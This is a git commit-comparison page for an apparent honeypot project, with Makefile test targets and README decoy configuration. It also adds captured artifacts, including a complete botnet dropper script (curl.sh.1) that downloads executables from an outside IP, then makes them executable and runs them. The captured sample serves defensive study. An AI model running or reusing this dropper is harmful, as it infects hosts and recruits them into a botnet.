Compare commits
492 Commits
testing
...
4586e36d63
| Author | SHA1 | Date | |
|---|---|---|---|
| 4586e36d63 | |||
| 8b3f74b39b | |||
| 0fe9f895d0 | |||
| ac332a6ba9 | |||
| e26876ee92 | |||
| 6a91858c15 | |||
| 54dede5077 | |||
| b41a7e3115 | |||
| ab18cd7797 | |||
| 0403cfc6a2 | |||
| 349f88252a | |||
| 59d3351306 | |||
| 80fff1efa4 | |||
| a009746dd1 | |||
| 52f2f65fa3 | |||
| ff51ce55e2 | |||
| a2c34cac02 | |||
| 9a7b03700c | |||
| de3634d739 | |||
| c39b63a431 | |||
| 6e7020f2aa | |||
| 471b33df1b | |||
| 39518e33b4 | |||
| a8f6a28f3a | |||
| 8f6f56f481 | |||
| 6fecf45dcd | |||
| 4c8ef2f104 | |||
| 64610bf96e | |||
| e4626879f6 | |||
| f63aca4186 | |||
| 95593cb804 | |||
| 16e032b7a5 | |||
| 967aec56d2 | |||
| d3899dde96 | |||
| c2693aafc3 | |||
| 92f43b4655 | |||
| f11def0af1 | |||
| 6a6f5807aa | |||
| 5675dd8ebc | |||
| 8d1f26c0c7 | |||
| 44ab42d80c | |||
| d09b891a55 | |||
| 42b5d97a50 | |||
| 1669f25733 | |||
| 255ccebf29 | |||
| d4f391bab1 | |||
| 38cf1e6c6d | |||
| 6618b3c2a1 | |||
| 7b54944fcc | |||
| 46963cbeec | |||
| f2b0d286b3 | |||
| f1ac1b4004 | |||
| 3154224f68 | |||
| 724380901f | |||
| 52a52eee78 | |||
| 251181255b | |||
| 92632d7afd | |||
| 0653e500b5 | |||
| ec5b49144e | |||
| 8dde954559 | |||
| d1478f900c | |||
| 39eb1ce5db | |||
| c66749209f | |||
| 41b8e9b7b3 | |||
| 155ab59ee8 | |||
| f10201e885 | |||
| 4c6b12dcf8 | |||
| 51d0fc7b6c | |||
| ef13e1fe4e | |||
| 97c99a4e03 | |||
| 1200ac9132 | |||
| 8990d9321d | |||
| d6a091be75 | |||
| e548be3c49 | |||
| c210a56fc8 | |||
| f827197cc8 | |||
| 1ee7a4a481 | |||
| 915bc6d7ef | |||
| fe0ed4a251 | |||
| c4d6eb5bb3 | |||
| 1d3086a5c7 | |||
| 84a075e405 | |||
| 9675f4bf92 | |||
| 4fbce6a8b0 | |||
| e50474cb66 | |||
| 0a9a2f9021 | |||
| 4bd502d3bf | |||
| e92d415304 | |||
| 1f3f58c42c | |||
| d25f69ba1b | |||
| a3f1cea2d6 | |||
| b326d70852 | |||
| bf79581cc9 | |||
| e29a0094c9 | |||
| 275fac5288 | |||
| 2c1ccec8fa | |||
| 780d395a46 | |||
| 9def7fd22f | |||
| 3a8519b2a1 | |||
| 31f4c54c32 | |||
| 7408a04a90 | |||
| 1ac64d2ae2 | |||
| 432057f44a | |||
| d743d38cac | |||
| 44f4dd8c85 | |||
| ac64329a13 | |||
| c1a65bf9a3 | |||
| 97e72d975b | |||
| a19d8bba17 | |||
| 6e0e1c204e | |||
| f33a011900 | |||
| 5f2a3f4629 | |||
| 212feb49e2 | |||
| 171e20e427 | |||
| 4a9cd90f90 | |||
| ccae1612bd | |||
| be35228191 | |||
| 8807da218b | |||
| f2fd314dd6 | |||
| b1fbf4630e | |||
| 209efd1a74 | |||
| 6ba12cc571 | |||
| c5cbe084cb | |||
| 0c8c74a89d | |||
| 69f547f75e | |||
| b664655dcb | |||
| e30455551d | |||
| a35048b174 | |||
| 08c274486e | |||
| 9da6f6983e | |||
| 9ddeb1a08c | |||
| 1e2bc41ab1 | |||
| 849caffaf1 | |||
| b6ff288dcf | |||
| 032ffbb4eb | |||
| 8c168c64a8 | |||
| 6d7c0b6419 | |||
| d5efebd73d | |||
| 14713eb294 | |||
| 9cee4b2e71 | |||
| 7b21f31078 | |||
| 95e1a4ab7a | |||
| f524d283b7 | |||
| 653ae04e88 | |||
| 22cfb10617 | |||
| 07a7d4918c | |||
| 3318b15044 | |||
| 5a34b1846c | |||
| ccff1467b1 | |||
| 6d1fc3a081 | |||
| a81ea3f973 | |||
| 438a6e3e45 | |||
| 9cab37db3a | |||
| 388a968d89 | |||
| aa0b22aacb | |||
| 11b2da7d54 | |||
| 34c778277a | |||
| df0c8e12e7 | |||
| 47c57271e7 | |||
| f3f7bff717 | |||
| 846a50dbbf | |||
| 65ddaaa681 | |||
| 0c1fc68b13 | |||
| 5253b32319 | |||
| 5de4b5e290 | |||
| 9cc3272a0d | |||
| 33f7d5a9ff | |||
| e2c7e16793 | |||
| dd265d7520 | |||
| c39802a4bb | |||
| 4956977739 | |||
| c2891d6cca | |||
| e94ab608d9 | |||
| 69c8cfd2b9 | |||
| b3ff80d74e | |||
| 7634e31e5a | |||
| 2ff2537f6c | |||
| bb77d13f9a | |||
| 5116023bf7 | |||
| 5ff89eefe7 | |||
| 834aa613b1 | |||
| bf3f9c746a | |||
| 588ea4e411 | |||
| aba1e37389 | |||
| 9ebaca410a | |||
| ac04751c18 | |||
| f10931f24d | |||
| 79f253c969 | |||
| 40a283a7ec | |||
| d4dc7dff81 | |||
| 3ba7e22b71 | |||
| acf8382bcf | |||
| 17b53dad4d | |||
| 337c7392b9 | |||
| 09f598ce47 | |||
| c11f3605be | |||
| 289a64014c | |||
| a25f4a890d | |||
| 51ecd0924e | |||
| c8166a6071 | |||
| cd7c7ea5a2 | |||
| b7ff5d2cc1 | |||
| 4257f7b6e2 | |||
| 07ff5ff0c9 | |||
| 1ff02f0c77 | |||
| b7534c311a | |||
| 96a4039366 | |||
| 1341df2705 | |||
| d40495d71b | |||
| 627fa59c15 | |||
| 46775fc0e5 | |||
| 0fba6b6113 | |||
| 8183218d29 | |||
| b704352783 | |||
| f286c84d95 | |||
| 6c2e4ada83 | |||
| 2254651270 | |||
| f948e10830 | |||
| 601986bd6d | |||
| bc62e42ce1 | |||
| 4fc980e968 | |||
| a077cf67c8 | |||
| 771944830a | |||
| 8161c67ec5 | |||
| d04f91cd8c | |||
| 0737fcfe93 | |||
| d90c8b70ce | |||
| 0510cde073 | |||
| 640294f3dc | |||
| 842b7de950 | |||
| 2f8c107e70 | |||
| 3fc6ea5f75 | |||
| e52a0e0381 | |||
| f3880b24d1 | |||
| 6763fceb0b | |||
| 879f5e731b | |||
| c9a81a23c2 | |||
| f8eae04e5d | |||
| a2a61b636e | |||
| 0972325527 | |||
| 11f474556c | |||
| 3f080f601d | |||
| 03beff3840 | |||
| 866a76eccf | |||
| 6c6f97e840 | |||
| dcd558fd91 | |||
| 6e19d3a25a | |||
| b3a96a045f | |||
| b88d67794d | |||
| e0b07651fd | |||
| 79674026dd | |||
| e972d870de | |||
| 7036a86e76 | |||
| cdbb3d3571 | |||
| 3e9c4c29b9 | |||
| c675bd26cf | |||
| b27332169d | |||
| 39a298f685 | |||
| b3ea3fa925 | |||
| 17367d0a69 | |||
| c714941069 | |||
| 291b78c1d0 | |||
| fb85762703 | |||
| e9324acac7 | |||
| 2ce150a53e | |||
| 9a7d116351 | |||
| f8dee596e5 | |||
| 75ff0ede1f | |||
| a31ad82880 | |||
| 999d3494b4 | |||
| d1c4a48963 | |||
| 84699f89da | |||
| 42e9492118 | |||
| c4e29e3bf9 | |||
| f9901befc4 | |||
| b5ce236cab | |||
| b043c96d29 | |||
| d9d2a80573 | |||
| e08bfc4a73 | |||
| 7ab0df3680 | |||
| ca1e04033c | |||
| 7d1f048764 | |||
| 301d3feee9 | |||
| e84b522fd3 | |||
| 65435f1427 | |||
| 44ade3eb63 | |||
| 9a31d0e50c | |||
| 07a609973b | |||
| 403d83faba | |||
| 101127247e | |||
| 322fd44d72 | |||
| 62ad76615e | |||
| 7a89fbb357 | |||
| f211d394e6 | |||
| 7865e71aa9 | |||
| eff3e4bce7 | |||
| 321ea7a2a6 | |||
| e7531ee756 | |||
| b819dfefa3 | |||
| dc1867315d | |||
| 1ad15470a1 | |||
| 806301e179 | |||
| b1fe1f9403 | |||
| c635478442 | |||
| ed3f340ea8 | |||
| 8a93ee3129 | |||
| f41995a229 | |||
| 89ce893792 | |||
| fee697694d | |||
| 226b3adfa2 | |||
| 3664ea7008 | |||
| 0217319423 | |||
| bf5414c0d1 | |||
| f4fe6fe6e4 | |||
| 4a93e16407 | |||
| 6814949bc0 | |||
| c276b5696e | |||
| fd81be0bb1 | |||
| 79e6df8343 | |||
| bcd1f14cd3 | |||
| b6e31e64e9 | |||
| b7f206c8c5 | |||
| cfbfaabfcd | |||
| b5a19301a2 | |||
| 0cdf8d90da | |||
| e2078c868d | |||
| 1ffaa3df41 | |||
| 5accf8f1b1 | |||
| cce84f23dc | |||
| e58aa4fe3a | |||
| e6f1da2344 | |||
| c3a799726f | |||
| 19cc8aa859 | |||
| 208ffd8f4f | |||
| cb9d183c20 | |||
| a703f9eda7 | |||
| c3c5813211 | |||
| e395306dcb | |||
| ce7efdfdd2 | |||
| d09764beec | |||
| 9e003d3acd | |||
| 776861a1b7 | |||
| bd50b0d8b2 | |||
| f6e67c036d | |||
| d187304e99 | |||
| 0f90dcfd3e | |||
| 65a2bdf0e7 | |||
| ed6263a53d | |||
| ee24a7551f | |||
| 7e4da95091 | |||
| b9684254f0 | |||
| e387acf79d | |||
| d637ff515e | |||
| 502ac42518 | |||
| f597ab2810 | |||
| 19271f9319 | |||
| 52b5074149 | |||
| 614780f144 | |||
| d777a1c4e0 | |||
| 9cf7bc5aab | |||
| 5a240a3d55 | |||
| 05cdd72d51 | |||
| 6f8f2ed573 | |||
| 23caa86266 | |||
| 909913e912 | |||
| fc1f0914b7 | |||
| 3456d3ab45 | |||
| 3cb0203d07 | |||
| eb34d0b1ea | |||
| 78d3e3a6b9 | |||
| 0b5228eb94 | |||
| 57fecb8071 | |||
| b754e9aa8b | |||
| 402d6584ba | |||
| 9ad62d8177 | |||
| eb7ccd0006 | |||
| 17480093a9 | |||
| d1ed2701e7 | |||
| 07e6bafff8 | |||
| 84e0ac4a43 | |||
| 257857338c | |||
| 3fce597a70 | |||
| 2629a8a0de | |||
| a8c69155ff | |||
| 8a40f6ced0 | |||
| 1e1c92abc3 | |||
| ebe15310ab | |||
| c7fcd86be4 | |||
| f597d70430 | |||
| f6422f2529 | |||
| 542d129d6f | |||
| a5487eb55f | |||
| e124f9e296 | |||
| c648d8b04e | |||
| 72498f81b2 | |||
| d0b07bdf52 | |||
| 4d12fb6a03 | |||
| 633594b110 | |||
| 761c23a07c | |||
| f0d47c5195 | |||
| 8ae7b9636e | |||
| 4c0a1309f0 | |||
| c78ba6f698 | |||
| fdf38a9d8c | |||
| 24cdef9246 | |||
| 9a4fe2677b | |||
| 4b7cb42ab1 | |||
| bbb1762250 | |||
| 2ddba04f79 | |||
| f0756dcdec | |||
| 18393f1e1c | |||
| 9ed0094045 | |||
| fca0953439 | |||
| b364c41736 | |||
| fbc9877ef2 | |||
| 9adee07d21 | |||
| a322d88b3c | |||
| 917f7e8e54 | |||
| f84c66cf9b | |||
| 07b32e2abe | |||
| 5f4005c47a | |||
| 2fc5f1bdc5 | |||
| b26dd8f529 | |||
| f86dc79990 | |||
| 907ade9142 | |||
| de6d5cd1a8 | |||
| dd807bc55e | |||
| f64e78f78c | |||
| 12cd7ad9cb | |||
| eefab020d4 | |||
| 94b06ee862 | |||
| 77ceb9d6f3 | |||
| d8fa7cc73d | |||
| 97260daf8d | |||
| 8d3f5c646a | |||
| 5912608f78 | |||
| ba0e7ca476 | |||
| e51666ee14 | |||
| bd7f2dfaed | |||
| 75b1ce3a31 | |||
| 54b1fbed14 | |||
| d314470d7f | |||
| 57e527534c | |||
| 892219ec87 | |||
| c002c5a4f1 | |||
| a27e3f5e0f | |||
| 98c929894c | |||
| e3afec4e70 | |||
| f347a3a736 | |||
| eed55619cb | |||
| 8c06190e69 | |||
| 578cdf9e2e | |||
| 2731b2608b | |||
| 472c84b9c8 | |||
| bbed52a962 | |||
| d595240f55 | |||
| 9e8d0b0464 | |||
| 463877b8fc | |||
| 0e5484648f | |||
| e7d49d7237 | |||
| 1a631c9400 | |||
| 2fabcd1c29 | |||
| 06f208c86e | |||
| 4287e94deb | |||
| c942d4d333 | |||
| 6ac8cac908 | |||
| 0bc4b05c73 | |||
| 3fe999d706 | |||
| 5802de1f86 | |||
| 04b0637c24 | |||
| e3ddeb0395 | |||
| 88f276e9e7 | |||
| 6055f9c837 | |||
| d4591b38dc | |||
| 862e4dbb31 | |||
|
|
499836c9e4 | ||
| bb9c782c41 | |||
| 597854cc06 | |||
| 3b4b0a1016 | |||
|
|
8ad3350d51 | ||
| 23ec470988 | |||
| 4064e19af1 | |||
|
|
ac4e5e1570 | ||
| eb40be2161 | |||
| 0927d9e1e8 | |||
| 9c81fb4739 | |||
| e4171789a8 | |||
| f64c251a9e | |||
| c56c9fe667 | |||
| 897f498bcd | |||
| 92e06cb193 | |||
| 7ad7e1e53b |
19
.gitignore
vendored
19
.gitignore
vendored
@@ -51,3 +51,22 @@ schem
|
|||||||
|
|
||||||
# pydeps-style dependency graph dumps from local analysis runs.
|
# pydeps-style dependency graph dumps from local analysis runs.
|
||||||
deps.txt
|
deps.txt
|
||||||
|
|
||||||
|
# Node modules vendored under decnet/canary/ for the obfuscator helper.
|
||||||
|
# The package.json is the source of truth; modules are reinstalled at
|
||||||
|
# build/deploy time.
|
||||||
|
node_modules/
|
||||||
|
package-lock.json
|
||||||
|
|
||||||
|
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
|
||||||
|
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
|
||||||
|
# files alongside ARE committed and exercise the harness in CI.
|
||||||
|
tests/ttp/rule_precision/corpus/*.jsonl
|
||||||
|
tests/ttp/rule_precision/corpus/seed_*.jsonl
|
||||||
|
threatfox-api.json
|
||||||
|
|
||||||
|
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
|
||||||
|
enterprise-attack-*.json
|
||||||
|
|
||||||
|
# pytest failure dump files
|
||||||
|
testfail
|
||||||
|
|||||||
219
Makefile
Normal file
219
Makefile
Normal file
@@ -0,0 +1,219 @@
|
|||||||
|
PYTEST := .311/bin/pytest
|
||||||
|
FAIL_FAST ?= 1
|
||||||
|
ARGS :=
|
||||||
|
|
||||||
|
# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
|
||||||
|
# Unit suites inherit that; special suites clear it with --override-ini.
|
||||||
|
UNIT_FLAGS := --timeout=30 --timeout-method=thread
|
||||||
|
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
|
||||||
|
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
|
||||||
|
--ignore=tests/api/test_schemathesis.py \
|
||||||
|
--ignore=tests/api/test_schemathesis_agent.py \
|
||||||
|
--ignore=tests/api/test_schemathesis_swarm.py \
|
||||||
|
--ignore=tests/api/test_schemathesis_ttp.py
|
||||||
|
SCHEMA_QUICK ?= 0
|
||||||
|
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
|
||||||
|
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
|
||||||
|
|
||||||
|
# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
|
||||||
|
|
||||||
|
.PHONY: test-core
|
||||||
|
test-core:
|
||||||
|
$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-web
|
||||||
|
test-web:
|
||||||
|
$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-db
|
||||||
|
test-db:
|
||||||
|
$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-bus
|
||||||
|
test-bus:
|
||||||
|
$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-ttp
|
||||||
|
test-ttp:
|
||||||
|
$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-intel
|
||||||
|
test-intel:
|
||||||
|
$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-analysis
|
||||||
|
test-analysis:
|
||||||
|
$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-infra
|
||||||
|
test-infra:
|
||||||
|
$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-fleet
|
||||||
|
test-fleet:
|
||||||
|
$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-cli
|
||||||
|
test-cli:
|
||||||
|
$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-features
|
||||||
|
test-features:
|
||||||
|
$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
# ── Go and React suites ───────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
_GO_MODULES := \
|
||||||
|
decnet/templates/_caddy_modules/decnetfp \
|
||||||
|
decnet/templates/http/_caddy_modules/decnetfp \
|
||||||
|
decnet/templates/https/_caddy_modules/decnetfp
|
||||||
|
|
||||||
|
.PHONY: test-go
|
||||||
|
test-go:
|
||||||
|
@failed=""; \
|
||||||
|
for mod in $(_GO_MODULES); do \
|
||||||
|
echo "=== go test: $$mod ==="; \
|
||||||
|
if (cd "$$mod" && go test ./...); then \
|
||||||
|
echo "[PASS] $$mod"; \
|
||||||
|
else \
|
||||||
|
echo "[FAIL] $$mod"; \
|
||||||
|
failed="$$failed $$mod"; \
|
||||||
|
if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
|
||||||
|
fi; \
|
||||||
|
done; \
|
||||||
|
[ -z "$$failed" ]
|
||||||
|
|
||||||
|
.PHONY: test-react
|
||||||
|
test-react:
|
||||||
|
cd decnet_web && npm run test:run $(ARGS)
|
||||||
|
|
||||||
|
# ── Special suites (sequential, longer timeout) ───────────────────────────────
|
||||||
|
|
||||||
|
.PHONY: test-live
|
||||||
|
test-live:
|
||||||
|
$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-api
|
||||||
|
test-api:
|
||||||
|
$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-stress
|
||||||
|
test-stress:
|
||||||
|
$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-service
|
||||||
|
test-service:
|
||||||
|
$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-fuzz
|
||||||
|
test-fuzz:
|
||||||
|
$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-schema
|
||||||
|
test-schema:
|
||||||
|
SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
|
||||||
|
tests/api/test_schemathesis.py \
|
||||||
|
tests/api/test_schemathesis_agent.py \
|
||||||
|
tests/api/test_schemathesis_swarm.py \
|
||||||
|
tests/api/test_schemathesis_ttp.py \
|
||||||
|
$(SCHEMA_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-bench
|
||||||
|
test-bench:
|
||||||
|
$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-docker
|
||||||
|
test-docker:
|
||||||
|
DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
# ── Static analysis ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
.PHONY: test-mypy
|
||||||
|
test-mypy:
|
||||||
|
.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
|
||||||
|
|
||||||
|
.PHONY: test-bandit
|
||||||
|
test-bandit:
|
||||||
|
.311/bin/bandit -r decnet -c pyproject.toml
|
||||||
|
|
||||||
|
.PHONY: test-vulture
|
||||||
|
test-vulture:
|
||||||
|
.311/bin/vulture decnet --min-confidence 80
|
||||||
|
|
||||||
|
.PHONY: test-pip-audit
|
||||||
|
test-pip-audit:
|
||||||
|
.311/bin/pip-audit
|
||||||
|
|
||||||
|
# ── Composite: all suites ─────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
|
||||||
|
go react \
|
||||||
|
live api schema stress service fuzz bench docker \
|
||||||
|
mypy bandit vulture pip-audit
|
||||||
|
|
||||||
|
.PHONY: test-all test
|
||||||
|
test-all test:
|
||||||
|
@failed=""; \
|
||||||
|
for suite in $(_ALL_SUITES); do \
|
||||||
|
echo ""; \
|
||||||
|
echo "══════════════════════════ $$suite ══════════════════════════"; \
|
||||||
|
if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
|
||||||
|
echo "[PASS] $$suite"; \
|
||||||
|
else \
|
||||||
|
echo "[FAIL] $$suite"; \
|
||||||
|
failed="$$failed $$suite"; \
|
||||||
|
if [ "$(FAIL_FAST)" = "1" ]; then \
|
||||||
|
echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
|
||||||
|
exit 1; \
|
||||||
|
fi; \
|
||||||
|
fi; \
|
||||||
|
done; \
|
||||||
|
if [ -n "$$failed" ]; then \
|
||||||
|
echo ""; \
|
||||||
|
echo "Failed:$$failed"; \
|
||||||
|
exit 1; \
|
||||||
|
fi; \
|
||||||
|
echo ""; \
|
||||||
|
echo "All suites passed."
|
||||||
|
|
||||||
|
.PHONY: help
|
||||||
|
help:
|
||||||
|
@echo "Unit suites (xdist, 30s timeout):"
|
||||||
|
@echo " make test-core tests/core + config + factories + fixtures"
|
||||||
|
@echo " make test-web tests/web + services"
|
||||||
|
@echo " make test-db tests/db + vectorstore"
|
||||||
|
@echo " make test-bus tests/bus + logging + telemetry"
|
||||||
|
@echo " make test-ttp tests/ttp"
|
||||||
|
@echo " make test-intel tests/intel + asn + geoip"
|
||||||
|
@echo " make test-analysis tests/clustering + correlation"
|
||||||
|
@echo " make test-infra tests/agent + collector + sniffer + profiler"
|
||||||
|
@echo " make test-fleet tests/fleet + swarm + topology + orchestrator + deploy + updater"
|
||||||
|
@echo " make test-cli tests/cli + engine + mutator + realism"
|
||||||
|
@echo " make test-features tests/canary + artifacts + webhook + decky_io + prober"
|
||||||
|
@echo ""
|
||||||
|
@echo "Go / React suites:"
|
||||||
|
@echo " make test-go go test ./... in each Caddy module variant"
|
||||||
|
@echo " make test-react vitest run in decnet_web"
|
||||||
|
@echo ""
|
||||||
|
@echo "Special suites (sequential, 120s timeout):"
|
||||||
|
@echo " make test-live tests/live"
|
||||||
|
@echo " make test-api tests/api (schemathesis)"
|
||||||
|
@echo " make test-stress tests/stress"
|
||||||
|
@echo " make test-service tests/service_testing"
|
||||||
|
@echo " make test-schema schemathesis contract tests (-m fuzz, xdist logical)"
|
||||||
|
@echo " make test-schema SCHEMA_QUICK=1 same, capped at 100 examples per test"
|
||||||
|
@echo " make test-fuzz hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
|
||||||
|
@echo " make test-bench tests/perf"
|
||||||
|
@echo " make test-docker tests/docker (needs DECNET_LIVE_DOCKER=1)"
|
||||||
|
@echo ""
|
||||||
|
@echo "Static analysis:"
|
||||||
|
@echo " make test-mypy mypy type check on decnet/"
|
||||||
|
@echo " make test-bandit bandit security scan on decnet/"
|
||||||
|
@echo " make test-vulture vulture dead code scan (>=80% confidence)"
|
||||||
|
@echo " make test-pip-audit pip-audit dependency vulnerability scan"
|
||||||
|
@echo ""
|
||||||
|
@echo "Composites:"
|
||||||
|
@echo " make test-all ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
|
||||||
|
@echo " make test-all FAIL_FAST=0 same, report all failures instead of stopping"
|
||||||
|
@echo ""
|
||||||
|
@echo "Passthrough: make test-web ARGS='--lf -s'"
|
||||||
@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
|
|||||||
|
|
||||||
| Slug | Services | OS Fingerprint | Description |
|
| Slug | Services | OS Fingerprint | Description |
|
||||||
|---|---|---|---|
|
|---|---|---|---|
|
||||||
|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
|
||||||
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
||||||
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
||||||
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
||||||
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
|
|||||||
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
||||||
|
|
||||||
```ini
|
```ini
|
||||||
|
[deaddeck-1]
|
||||||
|
amount=1
|
||||||
|
archetype=deaddeck
|
||||||
|
ssh.password=admin
|
||||||
|
|
||||||
[decky-webmail.http]
|
[decky-webmail.http]
|
||||||
server_header = Apache/2.4.54 (Debian)
|
server_header = Apache/2.4.54 (Debian)
|
||||||
fake_app = wordpress
|
fake_app = wordpress
|
||||||
|
|||||||
3
artifacts/curl.sh
Normal file
3
artifacts/curl.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
[0] Downloading 'http://31.56.209.39/curl.sh' ...
|
||||||
|
Saving 'curl.sh.1'
|
||||||
|
HTTP response 200 OK [http://31.56.209.39/curl.sh]
|
||||||
46
artifacts/curl.sh.1
Normal file
46
artifacts/curl.sh.1
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
ulimit -n 4096
|
||||||
|
ulimit -n 999999
|
||||||
|
ulimit -v 2097152
|
||||||
|
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||||
|
rm -rf odin*
|
||||||
|
rm -rf bizy*
|
||||||
|
rm -rf rs*
|
||||||
|
rm -rf *.sh
|
||||||
|
|
||||||
|
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||||
|
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||||
|
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||||
|
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||||
|
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||||
|
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||||
|
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||||
|
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||||
|
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||||
|
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||||
|
|
||||||
|
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
|
||||||
|
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
|
||||||
|
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
|
||||||
|
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
|
||||||
|
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
|
||||||
|
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
|
||||||
|
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
|
||||||
|
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
|
||||||
|
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
|
||||||
|
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
|
||||||
|
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
|
